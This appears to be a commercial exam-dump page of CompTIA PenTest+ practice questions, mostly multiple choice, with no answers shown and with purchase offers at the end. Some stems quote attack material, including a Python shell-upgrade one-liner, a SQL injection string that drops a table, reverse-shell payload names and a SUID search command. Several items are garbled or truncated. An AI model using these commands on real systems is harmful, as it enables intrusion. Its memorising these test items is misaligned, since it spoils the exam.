A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?

Options:

A.

Situational awareness

B.

Rescheduling

C.

DDoS defense

D.

Deconfliction

Buy Now
Questions 98

A penetration tester has prepared the following phishing email for an upcoming penetration test:

PT0-002 Question 98

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

Options:

A.

Familiarity and likeness

B.

Authority and urgency

C.

Scarcity and fear

D.

Social proof and greed

Buy Now
Questions 99

Penetration tester has discovered an unknown Linux 64-bit executable binary. Which of the following tools would be BEST to use to analyze this issue?

Options:

A.

Peach

B.

WinDbg

C.

GDB

D.

OllyDbg

Buy Now
Questions 100

A company recently moved its software development architecture from VMs to containers. The company has asked a penetration tester to determine if the new containers are configured correctly against a DDoS attack. Which of the following should a tester perform first?

Options:

A.

Test the strength of the encryption settings.

B.

Determine if security tokens are easily available.

C.

Perform a vulnerability check against the hypervisor.

D.

.Scan the containers for open ports.

Buy Now
Questions 101

SIMULATION

Using the output, identify potential attack vectors that should be further investigated.

PT0-002 Question 101

PT0-002 Question 101

PT0-002 Question 101

PT0-002 Question 101

PT0-002 Question 101

Options:

Buy Now
Questions 102

When accessing the URL http://192.168.0-1/validate/user.php, a penetration tester obtained the following output:

..d index: eid in /apache/www/validate/user.php line 12

..d index: uid in /apache/www/validate/user.php line 13

..d index: pw in /apache/www/validate/user.php line 14

..d index: acl in /apache/www/validate/user.php line 15

Options:

A.

Lack of code signing

B.

Incorrect command syntax

C.

Insufficient error handling

D.

Insecure data transmission

Buy Now
Questions 103

A penetration tester discovered a code repository and noticed passwords were hashed before they were stored in the database with the following code? salt = ‘123’ hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) The tester recommended the code be updated to the following salt = os.urandom(32) hash = hashlib.pbkdf2_hmac(‘sha256’, plaintext, salt, 10000) Which of the following steps should the penetration tester recommend?

Options:

A.

Changing passwords that were created before this code update

B.

Keeping hashes created by both methods for compatibility

C.

Rehashing all old passwords with the new code

D.

Replacing the SHA-256 algorithm to something more secure

Buy Now
Questions 104

A penetration tester is able to use a command injection vulnerability in a web application to get a reverse shell on a system After running a few commands, the tester runs the following:

python -c 'import pty; pty.spawn("/bin/bash")'

Which of the following actions Is the penetration tester performing?

Options:

A.

Privilege escalation

B.

Upgrading the shell

C.

Writing a script for persistence

D.

Building a bind shell

Buy Now
Questions 105

During a penetration test, a tester is in close proximity to a corporate mobile device belonging to a network administrator that is broadcasting Bluetooth frames.

Which of the following is an example of a Bluesnarfing attack that the penetration tester can perform?

Options:

A.

Sniff and then crack the WPS PIN on an associated WiFi device.

B.

Dump the user address book on the device.

C.

Break a connection between two Bluetooth devices.

D.

Transmit text messages to the device.

Buy Now
Questions 106

A penetration tester needs to upload the results of a port scan to a centralized security tool. Which of the following commands would allow the tester to save the results in an interchangeable format?

Options:

A.

nmap -iL results 192.168.0.10-100

B.

nmap 192.168.0.10-100 -O > results

C.

nmap -A 192.168.0.10-100 -oX results

D.

nmap 192.168.0.10-100 | grep "results"

Buy Now
Questions 107

A penetration tester gains access to a web server and notices a large number of devices in the system ARP table. Upon scanning the web server, the tester determines that many of the devices are user ...ch of the following should be included in the recommendations for remediation?

Options:

A.

training program on proper access to the web server

B.

patch-management program for the web server.

C.

the web server in a screened subnet

D.

Implement endpoint  protection on the workstations

Buy Now
Questions 108

During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in the browser: unauthorized to view this page. Which of the following BEST explains what occurred?

Options:

A.

The SSL certificates were invalid.

B.

The tester IP was blocked.

C.

The scanner crashed the system.

D.

The web page was not found.

Buy Now
Questions 109

A penetration tester utilized Nmap to scan host 64.13.134.52 and received the following results:

PT0-002 Question 109

Based on the output, which of the following services are MOST likely to be exploited? (Choose two.)

Options:

A.

Telnet

B.

HTTP

C.

SMTP

D.

DNS

E.

NTP

F.

SNMP

Buy Now
Questions 110

Given the following code:

PT0-002 Question 110

Which of the following data structures is systems?

Options:

A.

A tuple

B.

A tree

C.

An array

D.

A dictionary

Buy Now
Questions 111

A penetration tester receives the following results from an Nmap scan:

PT0-002 Question 111

Which of the following OSs is the target MOST likely running?

Options:

A.

CentOS

B.

Arch Linux

C.

Windows Server

D.

Ubuntu

Buy Now
Questions 112

A penetration tester exploited a vulnerability on a server and remotely ran a payload to gain a shell. However, a connection was not established, and no errors were shown on the payload execution. The penetration tester suspected that a network device, like an IPS or next-generation firewall, was dropping the connection. Which of the following payloads are MOST likely to establish a shell successfully?

Options:

A.

windows/x64/meterpreter/reverse_tcp

B.

windows/x64/meterpreter/reverse_http

C.

windows/x64/shell_reverse_tcp

D.

windows/x64/powershell_reverse_tcp

E.

windows/x64/meterpreter/reverse_https

Buy Now
Questions 113

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

Options:

A.

Wait for the next login and perform a downgrade attack on the server.

B.

Capture traffic using Wireshark.

C.

Perform a brute-force attack over the server.

D.

Use an FTP exploit against the server.

Buy Now
Questions 114

An assessor wants to run an Nmap scan as quietly as possible. Which of the following commands will give the LEAST chance of detection?

Options:

A.

nmap -"T3 192.168.0.1

B.

nmap - "P0 192.168.0.1

C.

nmap - T0 192.168.0.1

D.

nmap - A 192.168.0.1

Buy Now
Questions 115

Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

Options:

A.

dig company.com MX

B.

whois company.com

C.

cur1 www.company.com

D.

dig company.com A

Buy Now
Questions 116

A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?

Options:

A.

Network segmentation

B.

Key rotation

C.

Encrypted passwords

D.

Patch management

Buy Now
Questions 117

The following output is from reconnaissance on a public-facing banking website:

PT0-002 Question 117

Based on these results, which of the following attacks is MOST likely to succeed?

Options:

A.

A birthday attack on 64-bit ciphers (Sweet32)

B.

An attack that breaks RC4 encryption

C.

An attack on a session ticket extension (Ticketbleed)

D.

A Heartbleed attack

Buy Now
Questions 118

A penetration tester runs the following command on a system:

find / -user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A.

Set the SGID on all files in the / directory

B.

Find the /root directory on the system

C.

Find files with the SUID bit set

D.

Find files that were created during exploitation and move them to /dev/null

Buy Now
Questions 119

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

Options:

A.

Analyze the malware to see what it does.

B.

Collect the proper evidence and then remove the malware.

C.

Do a root-cause analysis to find out how the malware got in.

D.

Remove the malware immediately.

E.

Stop the assessment and inform the emergency contact.

Buy Now
Questions 120

Deconfliction is necessary when the penetration test:

Options:

A.

determines that proprietary information is being stored in cleartext.

B.

occurs during the monthly vulnerability scanning.

C.

uncovers indicators of prior compromise over the course of the assessment.

D.

proceeds in parallel with a criminal digital forensic investigation.

Buy Now
Questions 121

A penetration tester conducted an assessment on a web server. The logs from this session show the following:

http://www.thecompanydomain.com/servicestatus.php?serviceID=892 &serviceID=892 ‘ ; DROP TABLE SERVICES; --

Which of the following attacks is being attempted?

Options:

A.

Clickjacking

B.

Session hijacking

C.

Parameter pollution

D.

Cookie hijacking

E.

Cross-site scripting

Buy Now
Questions 122

An Nmap scan shows open ports on web servers and databases. A penetration tester decides to run WPScan and SQLmap to identify vulnerabilities and additional information about those systems.

Which of the following is the penetration tester trying to accomplish?

Options:

A.

Uncover potential criminal activity based on the evidence gathered.

B.

Identify all the vulnerabilities in the environment.

C.

Limit invasiveness based on scope.

D.

Maintain confidentiality of the findings.

Buy Now
Questions 123

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

Options:

A.

Enforce mandatory employee vacations

B.

Implement multifactor authentication

C.

Install video surveillance equipment in the office

D.

Encrypt passwords for bank account information

Buy Now
Questions 124

A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?

Options:

A.

Nmap

B.

tcpdump

C.

Scapy

D.

hping3

Buy Now
Questions 125

A consultant just performed a SYN scan of all the open ports on a remote host and now needs to remotely identify the type of services that are running on the host. Which of the following is an active reconnaissance tool that would be BEST to use to accomplish this task?

Options:

A.

tcpdump

B.

Snort

C.

Nmap

D.

Netstat

E.

Fuzzer

Buy Now
Questions 126

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Options:

A.

Run nmap with the –o, -p22, and –sC options set against the target

B.

Run nmap with the –sV and –p22 options set against the target

C.

Run nmap with the --script vulners option set against the target

D.

Run nmap with the –sA option set against the target

Buy Now
Questions 127

A new client hired a penetration-testing company for a month-long contract for various security assessments against the client’s new service. The client is expecting to make the new service publicly available shortly after the assessment is complete and is planning to fix any findings, except for critical issues, after the service is made public. The client wants a simple report structure and does not want to receive daily findings.

Which of the following is most important for the penetration tester to define FIRST?

Options:

A.

Establish the format required by the client.

B.

Establish the threshold of risk to escalate to the client immediately.

C.

Establish the method of potential false positives.

D.

Establish the preferred day of the week for reporting.

Buy Now
Questions 128

A penetration tester is working on a scoping document with a new client. The methodology the client uses includes the following:

    Pre-engagement interaction (scoping and ROE)

    Intelligence gathering (reconnaissance)

    Threat modeling

    Vulnerability analysis

    Exploitation and post exploitation

    Reporting

Which of the following methodologies does the client use?

Options:

A.

OWASP Web Security Testing Guide

B.

PTES technical guidelines

C.

NIST SP 800-115

D.

OSSTMM

Buy Now
Questions 129

A new security firm is onboarding its first client. The client only allowed testing over the weekend and needed the results Monday morning. However, the assessment team was not able to access the environment as expected until Monday. Which of the following should the security company have acquired BEFORE the start of the assessment?

Options:

A.

A signed statement of work

B.

The correct user accounts and associated passwords

C.

The expected time frame of the assessment

D.

The proper emergency contacts for the client

Buy Now
Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Last Update: Dec 4, 2024
Questions: 445

PDF + Testing Engine

$66  $164.99

Testing Engine

$50  $124.99
buy now PT0-002 testing engine

PDF (Q&A)

$42  $104.99
buy now PT0-002 pdf